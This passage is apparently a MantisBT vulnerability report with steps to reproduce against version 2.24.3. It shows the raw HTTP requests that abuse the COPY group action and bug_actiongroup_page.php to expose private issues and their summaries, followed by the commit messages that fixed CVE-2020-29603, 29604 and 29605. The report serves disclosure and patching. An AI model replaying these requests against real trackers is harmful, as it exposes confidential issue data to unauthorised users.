		<tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i>  <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a></td> <td>This is my private issue please dont access me</td> </tr>
		<tr class="spacer"></tr>
			</tbody>
		</table>
		</div>
		</div>
		<div class="widget-toolbox padding-8 clearfix">
			<input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" />
		</div>
		</div>
		</div>
	</form>
</div>
</div>

</div>
</div>
</div>
<div class="clearfix"></div>
<div class="space-20"></div>
<div class="footer noprint">
<div class="footer-inner">
<div class="footer-content">
<div class="col-md-6 col-xs-12 no-padding">
<address>
<strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br>
<small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br>
</address>
</div>
<div class="col-md-6 col-xs-12">
<div class="pull-right" id="powered-by-mantisbt-logo">
<a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a>
</div>
</div>
</div>
</div>
</div>
<a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#">
<i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i>
</a>
</div>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script>
	<script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script>
</body>
</html>

```

- It will redirect to ``bug_actiongroup_page.php``

- Click the ``Copy issues``

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1

```

**Response**

```
HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 23:56:39 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:56:39 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

```

- we finally leaked the full information of a private issue !

### It's too late

The following function allows me to disclose the title this stuffs can be found on ``bug_actiongroup_page.php``

**This is the overall request they are just different action value**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION
```

The title for this section is too late because they don't allow the certain functionality but they already leaked the summary



- move issues returns ``You did not have appropriate permissions to perform that action.``
- assign issues returns ``You did not have appropriate permissions to perform that action.``
- close issue returns ``You did not have appropriate permissions to perform that action.``
- delete issue returns ``You did not have appropriate permissions to perform that action.``
- resolve issues returns ``You did not have appropriate permissions to perform that action.``
- set sticky return ``You did not have appropriate permissions to perform that action.``
- update priority returns ``You did not have appropriate permissions to perform that action.``
- update severity returns ``Access Denied.``
- update status returns ``You did not have appropriate permissions to perform that action.``
- update view returns ``You did not have appropriate permissions to perform that action.``
- add note returns ``Access Denied.``
- attach tags returns ``Attach permission denied.``

27357_steps_to_reproduce.md (64,730 bytes)   

Related Changesets

MantisBT: master cff10f26

2020-12-06 12:39:55

dregad

Details Diff
Avoid private project name disclosure

When an unprivileged user tries to access a private project via
manage_proj_edit_page.php, they receive an Access Denied as expected,
but the project's name is leaked via the navbar's project selector.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting and
providing an initial patch for this bug.

Fixes 0027726, 0027357, CVE-2020-29603
Affected Issues
0027357, 0027726
mod - core/layout_api.php Diff File

MantisBT: master 12a9dcbb

2020-12-06 18:08:56

dregad

Details Diff
Prevent disclosure of private issue summary

Insufficient access level checks allowed an attacker to display private
issues' summary via Group Actions (bug_actiongroup_page.php).

Going through the provided list of issue IDs (bug_arr[]) and removing
any issues the user does not have access to, fixes the vulnerability.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue.

Fixes 0027727, 0027357, CVE-2020-29605
Affected Issues
0027357, 0027727
mod - bug_actiongroup_page.php Diff File

MantisBT: master b2da7352

2020-12-06 18:43:41

dregad

Details Diff
Prevent full private issue disclosure

Missing access check in bug_actiongroup.php allows an attacker with
rights to create new issues to use the COPY group action to create a
clone of any private issue (including all bugnotes and attachments),
thus gaining full access to potentially confidential information.

Credits to d3vpoo1 (https://gitlab.com/jrckmcsb) for reporting the issue.

Fixes 0027728, 0027357, CVE-2020-29604
Affected Issues
0027357, 0027728
mod - bug_actiongroup.php Diff File